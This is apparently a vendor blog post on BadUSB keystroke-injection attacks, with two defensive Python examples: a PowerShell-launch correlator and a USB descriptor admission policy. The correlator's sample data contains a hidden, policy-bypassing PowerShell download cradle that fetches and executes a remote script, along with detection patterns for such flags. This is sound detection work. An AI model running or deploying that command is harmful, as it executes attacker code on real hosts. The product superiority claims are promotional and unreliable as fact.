Bad USB (or BadUSB) attacks are hardware-based attacks that pose a serious risk to computer systems. They rely on a USB device that carries malicious firmware, or that has been modified to behave in unexpected and harmful ways.
Once connected to a computer, the malicious BadUSB device can execute commands, exploit vulnerabilities, or install malware without the user’s knowledge or consent.
Bad USB Attack Study
A company received a letter containing a $50 Best Buy gift card together with a USB thumb drive. Once plugged in, the drive was supposed to display a list of items that could be purchased with the gift card. The company did not take the bait and instead contacted security experts at a cybersecurity firm, who established that the company had been targeted by a BadUSB attack. This was not the first targeted attack on the hospitality industry.
Known threat actors such as DarkHotel and RevengeHotels have a history of activity in this industry. This attack is notable for using a physical rogue device that impersonates a genuine keyboard, which lets it evade existing endpoint security (EPP/EDR) solutions.
Only visibility that goes deeper, down to the physical layer, can provide adequate protection.
After investigating, the cybersecurity firm determined that the USB device was responsible for the attack. The device, known as a “Bad USB”, functions as a keyboard and sends keystrokes that launch commands to download and install malware onto the computer.
To install the malware, the device typed a sequence of keystrokes that launched a PowerShell command; that command downloaded a larger PowerShell script, which in turn installed the malware.
What makes this particularly alarming is that the device can be nearly indistinguishable from an ordinary USB device, so an unsuspecting user has no practical way of telling whether the device they are plugging in is legitimate or compromised.
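One way to catch the launch step described above is to correlate the arrival of a new keyboard-class device with a PowerShell process that appears seconds later with flags an operator rarely types by hand. The following is an added example written for this article, not the investigating firm's or Sepio's tooling. Its input records are constructed: one is modelled on Windows Security event 6416 (“a new external device was recognized by the system”), the others on Sysmon event 1 (process creation). The command line, the device instance path and the IP address are illustrative assumptions, not the ones from the real incident.

```python
"""Correlate a newly attached keyboard with a suspicious PowerShell launch.

Added example for this article (not the investigating firm's tooling).
The records below are constructed: one is modelled on Windows Security
event 6416 ("a new external device was recognized by the system"), the
rest on Sysmon event 1 (process creation). The command line, device path
and IP address are illustrative, not the ones from the real incident.
"""
import re
from datetime import datetime, timedelta

EVENTS = [
    # Constructed: a keyboard-class device appears (field names follow event 6416).
    {"id": 6416, "time": "2023-05-10 09:14:02", "class": "Keyboard",
     "device_id": r"USB\VID_2341&PID_8036\7&2a1b3c4d&0&0000"},
    # Constructed: three seconds later, injected keystrokes open the Run dialog (Win+R),
    # so explorer.exe is the parent of a hidden, policy-bypassing download cradle.
    {"id": 1, "time": "2023-05-10 09:14:05",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -NoP -NonI -Exec Bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')\""},
    # Constructed: an administrator runs a harmless command from the Start menu.
    {"id": 1, "time": "2023-05-10 09:14:20",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -NoProfile -Command "Get-Service"'},
    # Constructed: a build script launched by an editor, hours later.
    {"id": 1, "time": "2023-05-10 11:30:12",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": "powershell -File build.ps1"},
]

# Flags that keystroke-injection payloads almost always combine: hidden window,
# no profile, non-interactive, encoded command, execution-policy bypass.
SUSPICIOUS_FLAGS = [
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"-nop(rofile)?\b", re.I),
    re.compile(r"-noni(nteractive)?\b", re.I),
    re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-ex(ec(utionpolicy)?)?\s+bypass", re.I),
]
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\bIEX\b", re.I)


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def powershell_score(ev):
    """Heuristic score for one process-creation event; 0 for non-PowerShell images."""
    exe = ev["image"].rsplit("\\", 1)[-1].lower()
    if exe not in ("powershell.exe", "pwsh.exe"):
        return 0
    score = sum(1 for p in SUSPICIOUS_FLAGS if p.search(ev["cmdline"]))
    if DOWNLOAD_CRADLE.search(ev["cmdline"]):
        score += 2
    # Win+R and Start-menu launches, which typed keystrokes produce, have explorer.exe as parent.
    if ev["parent"].rsplit("\\", 1)[-1].lower() == "explorer.exe":
        score += 1
    return score


def correlate(events, window=timedelta(seconds=30), threshold=4):
    """Alert on high-scoring PowerShell launches within `window` after a new keyboard."""
    arrivals = [e for e in events if e["id"] == 6416 and e["class"] == "Keyboard"]
    alerts = []
    for ev in events:
        if ev["id"] != 1:
            continue
        score = powershell_score(ev)
        if score < threshold:
            continue
        t = parse_time(ev["time"])
        for arr in arrivals:
            delay = t - parse_time(arr["time"])
            if timedelta(0) <= delay <= window:
                alerts.append({"device": arr["device_id"], "delay_s": delay.total_seconds(),
                               "score": score, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(f"ALERT score={a['score']} {a['delay_s']:.0f}s after {a['device']}: {a['cmdline']}")
```

The threshold matters: the administrator's `-NoProfile` launch also follows the device arrival within the window but scores only 2, so it is not reported, while the hidden, bypassing download cradle scores 7. Event 6416 requires the “Audit PNP Activity” policy to be enabled; without it the device-arrival half of the correlation is missing and only the process-side heuristic remains.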
Bad USB Threat: Stealthy Attacks via Arduino Microcontroller
The attackers built the device around an ATmega32U4 microcontroller (the Arduino chip used on boards such as the Leonardo and Micro, which has native USB support), programmed so that it enumerates as a trusted USB keyboard. The real purpose of the device is to surreptitiously type malicious commands into the attached computer, in this case installing malware.
This type of attack is very hard to detect: existing security software recognises such devices as genuine human interface devices (HIDs), so antivirus scans show no indication that an attack is under way. The alternative is advanced forensics, but physically dissecting and reverse engineering devices is not practical given the sheer number of devices in use across an organisation.
Ideally, an organisation will want a security software solution that detects these hardware attacks, which is what Sepio has developed.
Hardware Assets Management and Assets Visibility
IT and security teams in many enterprises struggle to obtain complete and accurate visibility into their hardware assets, especially in today’s mixed IT/OT/IoT environments. Without that visibility, policies governing hardware access are weakly enforced, which can lead to security incidents such as ransomware attacks and data leakage.
Tackling this challenge requires comprehensive visibility into hardware assets, regardless of their characteristics or of the connection interface an attacker exploits.
In short, the risk that USB devices carry, including the potential for BadUSB attacks, calls for a holistic hardware asset management strategy: robust visibility, defences that adapt dynamically, and a proactive stance against potential vulnerabilities.
Sepio’s Leadership in Rogue Device and Bad USB Mitigation
Sepio is the leader in the Rogue Device Mitigation (RDM) market, disrupting the cybersecurity industry by uncovering hidden BadUSB attacks and other rogue devices operating over USB or the network. Sepio’s asset risk management platform identifies, detects and handles all peripherals; no device goes unmanaged.
Sepio is the only company in the world to perform physical layer fingerprinting. Sepio calculates a digital fingerprint from the device descriptors of every connected peripheral and compares it against a known set of malicious devices, automatically blocking attacks, including BadUSB. Using machine learning, the software also analyses device behaviour to identify anomalies, such as a mouse acting as a keyboard.
In addition to deep physical layer visibility, a comprehensive policy enforcement mechanism recommends best-practice policies and allows the administrator to define a strict, or more granular, set of rules for the system to enforce.
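To make the two points above concrete (that security software sees a BadUSB device as an ordinary HID, and that a fingerprint computed from device descriptors can still be matched against known-bad devices and checked for a “mouse” that types), here is an added example written for this article. It is not Sepio’s implementation, only an illustration of the approach. The fields are the standard USB device descriptor values (idVendor, idProduct, the manufacturer/product/serial strings) plus the class/subclass/protocol triple of each interface descriptor. The sample devices are constructed; VID/PID values are illustrative except 2341:8036, which is the Arduino Leonardo (an ATmega32U4 board). On a real host the descriptors would come from an enumeration tool such as lsusb, pyusb or Get-PnpDevice.

```python
"""Descriptor fingerprinting and an HID admission policy for USB peripherals.

Added example for this article; not Sepio's implementation. Descriptor fields
are the standard USB ones; the devices below are constructed samples.
"""
import hashlib

USB_CLASS_HID = 0x03
USB_CLASS_MASS_STORAGE = 0x08
HID_SUBCLASS_BOOT = 0x01
HID_PROTOCOL_KEYBOARD = 0x01
HID_PROTOCOL_MOUSE = 0x02

# Constructed samples. VID/PID values are illustrative except 2341:8036 (Arduino Leonardo).
# Interfaces are (bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol).
SAMPLE_DEVICES = [
    {"vid": 0x046d, "pid": 0xc31c, "manufacturer": "Logitech", "product": "USB Keyboard",
     "serial": "", "interfaces": [(0x03, 0x01, 0x01), (0x03, 0x00, 0x00)]},
    {"vid": 0x2341, "pid": 0x8036, "manufacturer": "Arduino LLC", "product": "Arduino Leonardo",
     "serial": "", "interfaces": [(0x02, 0x02, 0x01), (0x0a, 0x00, 0x00), (0x03, 0x00, 0x00)]},
    {"vid": 0x1a2b, "pid": 0x0001, "manufacturer": "Generic", "product": "Wireless Mouse",
     "serial": "", "interfaces": [(0x03, 0x01, 0x02), (0x03, 0x01, 0x01)]},
    {"vid": 0x0951, "pid": 0x1666, "manufacturer": "Kingston", "product": "DataTraveler 3.0",
     "serial": "0C9D92E1C2F3", "interfaces": [(0x08, 0x06, 0x50)]},
    {"vid": 0x3c4d, "pid": 0x0002, "manufacturer": "Unknown", "product": "Gaming Keyboard",
     "serial": "", "interfaces": [(0x03, 0x01, 0x01)]},
]


def fingerprint(dev):
    """Stable digest of everything the device declares about itself."""
    canon = "|".join([
        f"{dev['vid']:04x}:{dev['pid']:04x}",
        dev.get("manufacturer", ""), dev.get("product", ""), dev.get("serial", ""),
        ",".join(f"{c:02x}/{s:02x}/{p:02x}" for c, s, p in dev["interfaces"]),
    ])
    return hashlib.sha256(canon.encode("utf-8")).hexdigest()


def declared_roles(dev):
    """Roles the interface descriptors declare.

    Only boot-protocol HID interfaces (subclass 1) name keyboard or mouse
    explicitly. A non-boot HID interface (subclass 0) only reveals its role in
    its HID report descriptor, which this example does not parse.
    """
    roles = set()
    for cls, sub, proto in dev["interfaces"]:
        if cls == USB_CLASS_HID and sub == HID_SUBCLASS_BOOT:
            if proto == HID_PROTOCOL_KEYBOARD:
                roles.add("keyboard")
            elif proto == HID_PROTOCOL_MOUSE:
                roles.add("mouse")
        elif cls == USB_CLASS_MASS_STORAGE:
            roles.add("storage")
    return roles


def classify(dev, allowlist, blocklist):
    """Return 'allow', 'block' or 'review' for one device."""
    if fingerprint(dev) in allowlist:
        return "allow"
    if (dev["vid"], dev["pid"]) in blocklist:
        return "block"
    roles = declared_roles(dev)
    name = f"{dev.get('manufacturer', '')} {dev.get('product', '')}".lower()
    # A device that calls itself a mouse but enumerates a keyboard interface.
    if "keyboard" in roles and "mouse" in name and "keyboard" not in name:
        return "block"
    # Composite thumb drive that can also type: the classic BadUSB shape.
    if "keyboard" in roles and "storage" in roles:
        return "block"
    if "keyboard" in roles:
        return "review"  # unknown keyboard: hold until an admin approves its fingerprint
    return "allow"


ALLOWLIST = {fingerprint(SAMPLE_DEVICES[0])}  # built while onboarding known-good hardware
BLOCKLIST = {(0x2341, 0x8036)}                 # illustrative entry: Arduino Leonardo VID/PID

if __name__ == "__main__":
    for d in SAMPLE_DEVICES:
        print(f"{d['vid']:04x}:{d['pid']:04x} {d['product']:<18} -> "
              f"{classify(d, ALLOWLIST, BLOCKLIST)}")
```

Two outcomes are worth noticing. The “Wireless Mouse” is blocked purely from its descriptors, because it enumerates a boot keyboard interface while naming itself a mouse. The Leonardo, however, exposes a non-boot HID interface, so with an empty blocklist the descriptors alone would let it through as an ordinary HID; that is exactly why a known-bad list and behavioural analysis (a device that suddenly types) are needed on top of descriptor fingerprinting.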
A holistic approach to cybersecurity is essential in today’s landscape, where attacks arrive through many vectors, including physical ones such as BadUSB devices.
Organizations should not only focus on traditional cybersecurity measures but also consider the physical security of their infrastructure. This includes measures to prevent unauthorized BadUSB devices from being connected to their networks, as well as monitoring and controlling the use of USB devices within the organization.
Sepio is at the forefront of providing protection for IT (Information Technology), OT (Operational Technology), IoT (Internet of Things) and peripheral infrastructures. Sepio’s solution not only secures these systems but also fortifies them against the constantly evolving landscape of USB-based threats. This all-encompassing strategy is crucial for organizations aiming to shield their hardware and data from ever-growing and increasingly intricate cyber threats.